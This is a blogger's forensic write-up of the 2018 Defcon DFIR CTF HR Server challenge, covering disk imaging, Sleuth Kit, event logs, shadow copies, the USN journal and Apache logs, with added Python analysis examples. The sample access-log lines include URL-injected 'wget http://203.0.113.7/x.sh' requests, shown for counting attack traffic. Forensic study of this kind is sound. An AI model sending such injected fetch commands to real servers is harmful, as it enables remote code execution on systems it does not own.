DFIR Defcon Challenge — 2018 — My take — Part 1
I have been trying to write this for a while and finally thought I should give it a go before I forget how I did it. I scribble most of my day-to-day tasks and solutions in my notebook, but the words I write at the time often read differently when I come back to them later.
The views I express here are my own and do not in any way reflect the quality of the work I do for my employer. The tools I use are mostly open source (at times a free trial version), and I do not claim any credit for their creators' work.
I have been listening to David Cowen's Forensic Lunch podcast (from the Hacking Exposed Computer Forensics blog) for a while, mostly during my drive between office and home, and I am also a fan of the experiments they run in the Test Kitchen show. One of the episodes led me to this challenge and gave me the idea to try it out. I am pretty late to the party, though, as the blog mentions that a DFIR CTF will be set up at the Magnet Forensics user summit in April '19.
There is a neat and complete solution explained by Mon at the link below: https://medium.com/@monliclican/defcon-dfir-ctf-2018-lessons-learned-890ef781b96c
Link to challenge and CTF: https://www.hecfblog.com/2018/08/daily-blog-451-defcon-dfir-ctf-2018.html
OK, let's get started. Let me share my current scoreboard before I complete the rest on my own (or peek at other blogs for answers :P).
For the sake of demonstration I am registering a new account so I can start from the first question in the challenge.
HR Server Basic
Q1. Which software was used to image the HR Server?
If you extract image1 from the compressed file you will find the disk image was taken in E01 (Expert Witness) format, with a text document attached to it (which contains the answer). I have a SIFT Workstation installed in VMware Player, and I use FTK Imager on my Windows desktop when the solution is straightforward or when a Windows freeware tool is available to extract the data.
I mounted the image in FTK Imager and opened its properties, which list the acquisition tool as XWF 19.6, i.e. X-Ways Forensics 19.6.
Q2. Which version of the software was used to image the HR Server? [Format: n.n]
Answer: 19.6
Q3. What is the file name that represents MFT Entry 168043?
Let's mount the image in the SIFT workstation and use the Sleuth Kit command-line tools, which I find easier; I find command-line tools more fascinating than GUI versions.
The SIFT toolset has many options for mounting the disk image: ewfmount, the imageMounter.py script, loading the image in Autopsy, etc.
The command line used: ewfmount <diskimage> <mountdirectory>, which exposes the E01 as a raw image file (ewf1) inside the mount directory.
Let's use fdisk -l or mmls to identify the partition layout (the volume layer).
I tried the default mount option without specifying the offset, which threw a few errors. Let me set the offset option to where the NTFS filesystem starts; the byte offset is the start sector reported by mmls or fdisk multiplied by the 512-byte sector size.
The screenshot below explains the command-line tools at each layer. I assume the image is outdated, as I remember seeing it during my college days (the data-layer commands have since been renamed from d* to blk*, e.g. dstat is now blkstat). The question references an MFT entry, which falls under the metadata layer.
Let's point istat at the start of the operating system partition (with -o, which takes sectors, not bytes) and give it the MFT entry (inode number) to get the desired output.
Another option is ffind from the file-name layer, which also searches by inode number and returns the file name(s) pointing at that MFT entry.
Q4. What is the MFT Entry number of the following file? \xampp\mysql\bin\mysql.exe
Let's use ifind to get the MFT entry number for the above file path. I got stuck because I pasted the path exactly as given into my command: the Sleuth Kit expects forward slashes as path separators (and the Linux shell treats backslashes as escape characters), unlike Windows. Make sure you convert the slashes in the path you pass to the -n argument.
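The volume-layer and metadata-layer steps above (find the NTFS partition with mmls, turn its start sector into a byte offset for mount and a sector offset for istat/ifind/ffind, and convert the Windows path for ifind -n) as a small Python helper. This is an added example, not code from the write-up or from the Sleuth Kit; the mmls output, the image path /mnt/ewf/ewf1 and the mount point /mnt/windows are constructed, and the rule "the largest NTFS partition is the OS volume" is an assumption you should confirm against the real layout.

```python
import re

# Constructed sample of `mmls` output (not from the challenge image): a DOS
# partition table with a small and a large NTFS partition, 512-byte sectors.
SAMPLE_MMLS = """\
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

      Slot      Start        End          Length       Description
000:  Meta      0000000000   0000000000   0000000001   Primary Table (#0)
001:  -------   0000000000   0000002047   0000002048   Unallocated
002:  000:000   0000002048   0001026047   0001024000   NTFS / exFAT (0x07)
003:  000:001   0001026048   0125827071   0124801024   NTFS / exFAT (0x07)
"""

ROW_RE = re.compile(r"^\s*(\d+):\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.*?)\s*$")
UNITS_RE = re.compile(r"Units are in (\d+)-byte sectors")


def parse_mmls(text):
    """Return (sector_size, [partition dicts]) parsed from mmls output."""
    m = UNITS_RE.search(text)
    sector_size = int(m.group(1)) if m else 512
    parts = []
    for line in text.splitlines():
        row = ROW_RE.match(line)
        if not row:
            continue  # header, units line, blank lines
        idx, slot, start, end, length, desc = row.groups()
        parts.append({"index": int(idx), "slot": slot, "start": int(start),
                      "end": int(end), "length": int(length), "desc": desc})
    return sector_size, parts


def largest_ntfs(parts):
    """Assumption: the biggest NTFS/exFAT (0x07) partition is the OS volume."""
    ntfs = [p for p in parts if "NTFS" in p["desc"]]
    if not ntfs:
        raise ValueError("no NTFS partition in mmls output")
    return max(ntfs, key=lambda p: p["length"])


def to_tsk_path(windows_path):
    """What ifind -n expects: forward slashes and no drive letter."""
    p = windows_path.replace("\\", "/")
    if len(p) >= 2 and p[1] == ":":
        p = p[2:]
    return p.lstrip("/")


def tsk_commands(image, part, sector_size, mft_entry=None, path=None):
    """Build the mount and Sleuth Kit command lines for one partition.

    TSK's -o is an offset in sectors; mount's offset= is in bytes."""
    sectors = part["start"]
    cmds = {
        "mount": (f"mount -t ntfs -o ro,loop,show_sys_files,"
                  f"offset={sectors * sector_size} {image} /mnt/windows"),
        "fls": f"fls -o {sectors} -r {image}",
    }
    if mft_entry is not None:
        cmds["istat"] = f"istat -o {sectors} {image} {mft_entry}"
        cmds["ffind"] = f"ffind -o {sectors} {image} {mft_entry}"
    if path is not None:
        cmds["ifind"] = f"ifind -o {sectors} -n '{to_tsk_path(path)}' {image}"
    return cmds


if __name__ == "__main__":
    sector_size, parts = parse_mmls(SAMPLE_MMLS)
    os_part = largest_ntfs(parts)
    for name, cmd in tsk_commands("/mnt/ewf/ewf1", os_part, sector_size,
                                  mft_entry=168043,
                                  path=r"\xampp\mysql\bin\mysql.exe").items():
        print(f"{name:6} {cmd}")
```

Run it against real output by piping `mmls /mnt/ewf/ewf1` into `parse_mmls`; the mount line uses ntfs-3g's show_sys_files so $MFT and $Extend are visible once mounted.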
Q5. What is the MFT Attribute ID of the named $J data attribute for the MFT Entry with a file name of $UsnJrnl?
The Sleuth Kit can read the metadata address, and for NTFS it is displayed as ADDR-TYPE-ID.
ADDR is the metadata address, TYPE is the attribute type, and ID is the attribute id.
We can use fls -r to recurse through the directories ($UsnJrnl lives under $Extend) and get our desired output; the named $J stream shows up with attribute type 128 ($DATA) and the attribute id we are after.
Answer: 3
Q6: At 2018-08-08 18:10:38.554 (UTC), what was the IP address of the client that attempted to access SMB via an anonymous logon?
I proceeded to open Security.evtx after mounting the image in FTK Imager. I could only find 36 events there, and none were captured in the above time frame. I then started looking at other logs that could capture this and found the event log named "Microsoft-Windows-SMBServer%4Security" (the %4 in the file name stands for the "/" in the Microsoft-Windows-SMBServer/Security channel name).
Q7: What was the name of the batch file saved by mpowers?
[answer is fullpath starting with c:*****]
I extracted NTUSER.DAT from the mpowers profile folder and parsed it with RegRipper.
Searching the output for .bat gave many hits under the RecentDocs key, which led to this answer.
Answer: C:\Production\update_app.bat
Q9. What is the name of the hr management application that hosts a web server?
A keyword search in the user's registry hive revealed XAMPP being launched; XAMPP is a popular Apache/MySQL/PHP bundle for hosting web applications.
Answer: OrangeHRM
Q10. What was the public url for the HR system’s portal?
Since the earlier clue indicated that XAMPP was used to launch it, let's look at the Apache access.log, which records the URLs requested on that application.
To locate the folder where the application was installed, fls was run against the image and its output was searched for the keyword OrangeHRM.
istat on the MFT address (128558) revealed the entry is a directory, and its parent MFT entry number (59) revealed it is under the Program Files folder.
Navigating into the Apache logs folder and reading access.log revealed the public IP used by the application.
Answer: http://74.118.139.108/orangehrm-4.1/symfony/web/index.php/auth/login
Q11. What is name of the file that had a change recorded with an update sequence number of 368701440?
Using the attribute address gathered in Question 5, extract the contents of $UsnJrnl:$J with icat.
Using usn.py with the -v (verbose) option, point it at the extracted file and look for the corresponding hit.
Answer:
Q11. What is the name of the deleted file with a reference number of 12947848928752043?
Search the earlier output for the file reference number and look for an entry whose reason includes delete, or back-reference the MFT entry with istat (the low 48 bits of the reference number are the MFT entry, the high 16 bits the sequence number).
Answer: _MEI78882
HR Server — Advanced
Q1. At 2018–07–30 22:31:33 UTC which user was logged in under, what was the logon type (integer), and the logon process name?
While answering HR Server Basic Q6, we found that there are few event logs, that a 1102 (audit log cleared) event had been recorded, and that most of the surviving events are under operational logs rather than the standard Security.evtx. So I exported all event logs under the winevt folder using FTK Imager and copied them into a folder called Logs to make sure I was not missing any operational log that might hold our desired output.
I used a PowerShell log parser from GitHub that can parse all event logs under a folder in one go and output the fields to a .csv file.
I opened "mytimeline.csv" and filtered the time-created column to "2018-07-30 22h" so that I could see all events that happened around the said time.
I got the output below, where the key pieces of the question were answered.
So, from the logs I found in the TerminalServices folders, I formulated my answer as mpowers - 10 - Mstsc.exe - 74.118.138.195. Oops! That answer was wrong, as I had assumed the RDP client process would be mstsc.exe; the question asks for the logon process name, which is the LogonProcessName field of the 4624 event on the server, not the client program. I tried multiple entries and could not clear this level.
Since that answer hit a dead end, I proceeded to check whether any volume shadow copies were stored on this system; they might contain an unaltered copy of the standard event logs from before they were cleared (Event ID 1102).
vshadowinfo was used to check when the volume shadow copy was created. It showed it was created on 7 Aug 2018, which is after our pivot point of 30 July, so the snapshot might hold a copy of the Security log taken before it was cleared.
vshadowmount was used to mount the volume shadow copy.
I navigated to the mounted volume shadow location and then ran my mount command again, as shown below:
First let's compare the sizes of the standard event logs (Application, Security, System) in the volume shadow copy against our file-system mount. The volume shadow copy's Security.evtx was much larger than the one in the live file system, whose audit log had been cleared.
I copied Security.evtx from the shadow copy, opened it in Event Log Explorer, and filtered on Event ID 4624 to get the output below.
Answer: mpowers - 10 - User32 - 74.118.138.195 (make sure you leave a space on either side of the hyphens)
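The 4624 lookup, as an added example (not the write-up's or Event Log Explorer's code): filter Security events exported as XML to a time window and pull the fields the question asks for (the TargetUserName, LogonType, LogonProcessName and IpAddress data items), and flag any 1102 event that says the log was cleared. The event XML below is constructed, with the first event's values set to match the answer above; a `wevtutil qe Security /f:xml` export or python-evtx would supply real XML of the same shape. The Event namespace declaration and the padded LogonProcessName value are the two details that usually trip people up.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

# Windows event XML puts every element in this namespace; find() needs it.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed events (not exported from the challenge image). Values in the
# first one mirror the write-up's answer so the filter can be checked.
SAMPLE_EVENTS = [
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID>
    <TimeCreated SystemTime="2018-07-30T22:31:33.4567891Z"/></System>
  <EventData>
    <Data Name="TargetUserName">mpowers</Data>
    <Data Name="LogonType">10</Data>
    <Data Name="LogonProcessName">User32 </Data>
    <Data Name="IpAddress">74.118.138.195</Data>
  </EventData></Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID>
    <TimeCreated SystemTime="2018-08-02T09:15:00.0000000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">SYSTEM</Data>
    <Data Name="LogonType">5</Data>
    <Data Name="LogonProcessName">Advapi  </Data>
    <Data Name="IpAddress">-</Data>
  </EventData></Event>""",
    """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1102</EventID>
    <TimeCreated SystemTime="2018-08-08T16:20:00.1234567Z"/></System>
  <UserData/></Event>""",
]


def parse_utc(text):
    """'YYYY-MM-DD HH:MM:SS' -> aware UTC datetime (event logs are stored in UTC)."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def parse_event(xml_text):
    """Return {'id', 'time', 'data'} for one <Event>; data values are stripped,
    because LogonProcessName is space-padded ('User32 ', 'Advapi  ')."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    event_id = int(system.findtext("e:EventID", namespaces=NS))
    stamp = system.find("e:TimeCreated", NS).get("SystemTime")
    when = parse_utc(stamp[:19].replace("T", " "))  # drop the 100 ns fraction
    data = {d.get("Name"): (d.text or "").strip()
            for d in root.findall("e:EventData/e:Data", NS)}
    return {"id": event_id, "time": when, "data": data}


def logons_in_window(events, start, end):
    """4624 logons with TimeCreated in [start, end], as (user, type, process, ip)."""
    hits = []
    for ev in map(parse_event, events):
        if ev["id"] != 4624 or not (start <= ev["time"] <= end):
            continue
        d = ev["data"]
        hits.append((d.get("TargetUserName"), int(d.get("LogonType", "0")),
                     d.get("LogonProcessName"), d.get("IpAddress")))
    return hits


def audit_cleared(events):
    """Times of 1102 events: evidence that the live Security log is incomplete
    and that a shadow copy or other source is needed."""
    return [ev["time"] for ev in map(parse_event, events) if ev["id"] == 1102]


def ctf_answer(logon):
    user, logon_type, process, ip = logon
    return f"{user} - {logon_type} - {process} - {ip}"


if __name__ == "__main__":
    window = (parse_utc("2018-07-30 22:31:00"), parse_utc("2018-07-30 22:32:00"))
    for hit in logons_in_window(SAMPLE_EVENTS, *window):
        print(ctf_answer(hit))
    print("log cleared at:", audit_cleared(SAMPLE_EVENTS))
```

Logon type 10 is RemoteInteractive (RDP); on the server side such logons are recorded with LogonProcessName User32, while the client-side mstsc.exe never appears in the server's 4624 event.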
Q2. At 2018–07–27 02:42:43 (UTC), what is the name of the task that was started?
Based on the event logs parsed with the Parse-LogsToTimeLine.ps1 script, I filtered the output to the above timestamp. The Microsoft-Windows-TaskScheduler operational log has a line item showing the task that was started.
Answer: Throw Taco
Q3: Which IP address was accessing the OrangeHRM portal via Chrome 68.0.3440.84?
The best place to get this info is the access.log in the OrangeHRM (Apache) logs folder; grep it for Chrome/68.0.3440.84. Since the log puts a slash between the user-agent product name and its version, make sure you include that character in the search.
Answer: 74.118.139.108
Q4. What version of Apache was being used?
I navigated to the Apache logs folder and found an entry in error.log reporting Apache/2.4.26.
Answer: 2.4
Q5. What is the integer representation for the reason code given a USN V2 record where the record’s reason flags have the following:
USN_REASON_CLOSE | USN_REASON_DATA_EXTEND | USN_REASON_FILE_CREATE
I searched Google for the official USN V2 record documentation (the USN_RECORD_V2 structure on Microsoft Docs), where the hex values are documented as follows:
USN_REASON_CLOSE — 0x80000000 — The file or directory is closed.
USN_REASON_FILE_CREATE — 0x00000100 — The file or directory is created for the first time
USN_REASON_DATA_EXTEND — 0x00000002 — The file or directory is extended (added to).
I switched to the calculator and ORed the hex values together into 0x80000102. Its decimal equivalent is the answer for this challenge.
Answer: 2147483906
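The USN reason computation above, and the two $J questions in the Basic level (look up a record by USN, then map a deleted file's reference number back to its MFT entry), as one added Python example; it is not the write-up's usn.py nor Microsoft's code. It parses USN_RECORD_V2 structures from a buffer using the layout and reason flag values from the Microsoft documentation. The $J fragment is constructed with made-up USNs, parents and timestamps; only the deleted file's name and reference number are taken from the write-up, and the `build_record` helper exists purely to fabricate that test data (real $J content comes from icat).

```python
import struct
from datetime import datetime, timedelta, timezone

# USN_RECORD_V2 reason flags, values from the Microsoft documentation.
USN_REASON = {
    "USN_REASON_DATA_OVERWRITE": 0x00000001, "USN_REASON_DATA_EXTEND": 0x00000002,
    "USN_REASON_DATA_TRUNCATION": 0x00000004, "USN_REASON_NAMED_DATA_OVERWRITE": 0x00000010,
    "USN_REASON_NAMED_DATA_EXTEND": 0x00000020, "USN_REASON_NAMED_DATA_TRUNCATION": 0x00000040,
    "USN_REASON_FILE_CREATE": 0x00000100, "USN_REASON_FILE_DELETE": 0x00000200,
    "USN_REASON_EA_CHANGE": 0x00000400, "USN_REASON_SECURITY_CHANGE": 0x00000800,
    "USN_REASON_RENAME_OLD_NAME": 0x00001000, "USN_REASON_RENAME_NEW_NAME": 0x00002000,
    "USN_REASON_INDEXABLE_CHANGE": 0x00004000, "USN_REASON_BASIC_INFO_CHANGE": 0x00008000,
    "USN_REASON_HARD_LINK_CHANGE": 0x00010000, "USN_REASON_COMPRESSION_CHANGE": 0x00020000,
    "USN_REASON_ENCRYPTION_CHANGE": 0x00040000, "USN_REASON_OBJECT_ID_CHANGE": 0x00080000,
    "USN_REASON_REPARSE_POINT_CHANGE": 0x00100000, "USN_REASON_STREAM_CHANGE": 0x00200000,
    "USN_REASON_TRANSACTED_CHANGE": 0x00400000, "USN_REASON_INTEGRITY_CHANGE": 0x00800000,
    "USN_REASON_CLOSE": 0x80000000,
}

# Fixed 60-byte header of a USN_RECORD_V2: RecordLength, MajorVersion, MinorVersion,
# FileReferenceNumber, ParentFileReferenceNumber, Usn, TimeStamp, Reason, SourceInfo,
# SecurityId, FileAttributes, FileNameLength, FileNameOffset. The UTF-16LE name follows.
_HDR = struct.Struct("<IHHQQqqIIIIHH")


def reason_code(*names):
    """OR the named flags together (the Advanced Q5 computation)."""
    code = 0
    for n in names:
        code |= USN_REASON[n]
    return code


def decode_reason(code):
    """Map a reason DWORD back to flag names, lowest bit first."""
    return [n for n, v in sorted(USN_REASON.items(), key=lambda kv: kv[1]) if code & v]


def split_file_reference(ref):
    """NTFS file reference = (16-bit sequence number << 48) | 48-bit MFT entry."""
    return ref & 0xFFFFFFFFFFFF, ref >> 48


def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_record(buf, pos=0):
    """Parse one V2 record at buf[pos]; returns (record dict, offset of next record)."""
    (length, major, minor, file_ref, parent_ref, usn, ts, reason, _source,
     _sec_id, attrs, name_len, name_off) = _HDR.unpack_from(buf, pos)
    if major != 2:
        raise ValueError(f"unsupported USN record version {major}.{minor} at {pos}")
    name = buf[pos + name_off:pos + name_off + name_len].decode("utf-16-le")
    entry, seq = split_file_reference(file_ref)
    rec = {"usn": usn, "name": name, "file_reference": file_ref, "mft_entry": entry,
           "sequence": seq, "parent_entry": split_file_reference(parent_ref)[0],
           "time": filetime_to_datetime(ts), "reason": reason,
           "reasons": decode_reason(reason), "attributes": attrs}
    return rec, pos + length


def iter_records(buf):
    """Walk a $J buffer; zero-filled (sparse) stretches are skipped 8 bytes at a time."""
    pos = 0
    while pos + _HDR.size <= len(buf):
        if struct.unpack_from("<I", buf, pos)[0] == 0:
            pos += 8
            continue
        rec, pos = parse_record(buf, pos)
        yield rec


def find_by_usn(buf, usn):
    return next((r for r in iter_records(buf) if r["usn"] == usn), None)


def deleted_by_reference(buf, file_ref):
    """Records for one file reference whose reason carries USN_REASON_FILE_DELETE."""
    return [r for r in iter_records(buf)
            if r["file_reference"] == file_ref and r["reason"] & USN_REASON["USN_REASON_FILE_DELETE"]]


def build_record(file_ref, parent_ref, usn, reason, name, filetime=0, attrs=0x20):
    # Test-data helper only: fabricate an 8-byte-aligned V2 record.
    name_bytes = name.encode("utf-16-le")
    length = (60 + len(name_bytes) + 7) & ~7
    hdr = _HDR.pack(length, 2, 0, file_ref, parent_ref, usn, filetime, reason,
                    0, 0, attrs, len(name_bytes), 60)
    return hdr + name_bytes + b"\0" * (length - 60 - len(name_bytes))


# Constructed $J fragment: a sparse gap, then a create/extend/close record for a
# made-up file, then a delete/close record carrying the reference number from the
# Basic-level deleted-file question. USNs, parents and timestamps are invented.
SAMPLE_J = (
    b"\0" * 16
    + build_record((46 << 48) | 61866, (5 << 48) | 1234, 368640000,
                   reason_code("USN_REASON_FILE_CREATE", "USN_REASON_DATA_EXTEND",
                               "USN_REASON_CLOSE"), "example.txt", 131786346380000000)
    + build_record(12947848928752043, (5 << 48) | 1234, 368640096,
                   reason_code("USN_REASON_FILE_DELETE", "USN_REASON_CLOSE"),
                   "_MEI78882", 131786346390000000)
)
```

Feed it a real journal with `iter_records(open("J.bin", "rb").read())` after extracting $J with icat; `split_file_reference` is the step that turns a reference number such as 12947848928752043 into the MFT entry to hand to istat.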
HR Server — Expert
Q1. What was the top communicating IP address with the web server?
To answer this we need a parser that turns access.log into CSV or Excel. log2timeline (plaso) has a parser for Apache access logs, which helps here.
The output was loaded into a pivot table, as shown below, and conditional formatting was used to highlight the top 10 items.
Answer: 74.118.138.195
Q2. How many requests were made to the web server where the requested url contained a wget command within in?
The apache2access.csv output was filtered on the requested resource (or on the whole log line) for the keyword 'wget'.
Answer: 101 (102 matching rows minus 1 for the header row)
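The access.log work in Advanced Q3 and the two Expert questions (find clients by User-Agent, rank IPs by request count, count requests whose URL contains wget) as one added Python example; it is not the write-up's spreadsheet or plaso's code. The log lines are constructed in Apache combined format. URL-decoding before the wget match, and the difference between matching the URL field and matching the whole line (which also catches a Wget User-Agent), are the two points a plain keyword filter glosses over; counting parsed rows also avoids the off-by-one from the CSV header.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not the challenge's access.log).
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [08/Aug/2018:18:01:02 +0000] "GET /orangehrm-4.1/symfony/web/index.php/auth/login HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36"
203.0.113.7 - - [08/Aug/2018:18:02:10 +0000] "GET /orangehrm-4.1/symfony/web/index.php/auth/login HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
203.0.113.7 - - [08/Aug/2018:18:03:44 +0000] "GET /index.php?cmd=wget%20http://203.0.113.7/x.sh HTTP/1.1" 404 209 "-" "curl/7.58.0"
203.0.113.7 - - [08/Aug/2018:18:03:45 +0000] "GET /index.php?cmd=WGET+http://203.0.113.7/x.sh HTTP/1.1" 404 209 "-" "curl/7.58.0"
203.0.113.7 - - [08/Aug/2018:18:03:46 +0000] "GET /index.php?q=budget HTTP/1.1" 404 209 "-" "curl/7.58.0"
10.0.0.5 - - [08/Aug/2018:18:05:00 +0000] "POST /orangehrm-4.1/symfony/web/index.php/auth/validateCredentials HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36"
198.51.100.9 - - [08/Aug/2018:18:06:00 +0000] "GET /orangehrm-4.1/ HTTP/1.1" 200 1500 "-" "Wget/1.19.4 (linux-gnu)"
"""

# Combined log format: host ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_access_log(text):
    """Return one dict per parsable line; malformed lines are counted, not dropped silently."""
    rows, bad = [], 0
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            bad += 1
            continue
        row = m.groupdict()
        parts = row["request"].split(" ")
        row["url"] = parts[1] if len(parts) >= 2 else row["request"]
        # Attackers URL-encode payloads ("wget%20http://..."); decode before matching.
        row["decoded_url"] = unquote_plus(row["url"])
        rows.append(row)
    return rows, bad


def top_talkers(rows, n=10):
    """IPs ranked by request count (Expert Q1)."""
    return Counter(r["ip"] for r in rows).most_common(n)


def ips_by_user_agent(rows, fragment):
    """Distinct client IPs whose User-Agent contains the fragment (Advanced Q3)."""
    return sorted({r["ip"] for r in rows if fragment in r["ua"]})


def count_wget_in_url(rows):
    """Requests whose decoded URL contains 'wget', case-insensitive (Expert Q2)."""
    return sum(1 for r in rows if "wget" in r["decoded_url"].lower())


def count_wget_anywhere(text):
    """Whole-line grep: broader, because a Wget User-Agent also matches."""
    return sum(1 for line in text.splitlines() if "wget" in line.lower())


if __name__ == "__main__":
    rows, bad = parse_access_log(SAMPLE_ACCESS_LOG)
    print("unparsed lines:", bad)
    print("top talkers:", top_talkers(rows))
    print("Chrome/68.0.3440.84 clients:", ips_by_user_agent(rows, "Chrome/68.0.3440.84"))
    print("wget in URL:", count_wget_in_url(rows),
          "| wget anywhere:", count_wget_anywhere(SAMPLE_ACCESS_LOG))
```

Report which of the two wget counts you used; the question asks about the requested URL, so `count_wget_in_url` is the one that matches its wording.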
Once this is done, the next level unlocks and reveals the password for the next image.
Thanks for reading. I will write up the remaining images in the coming days!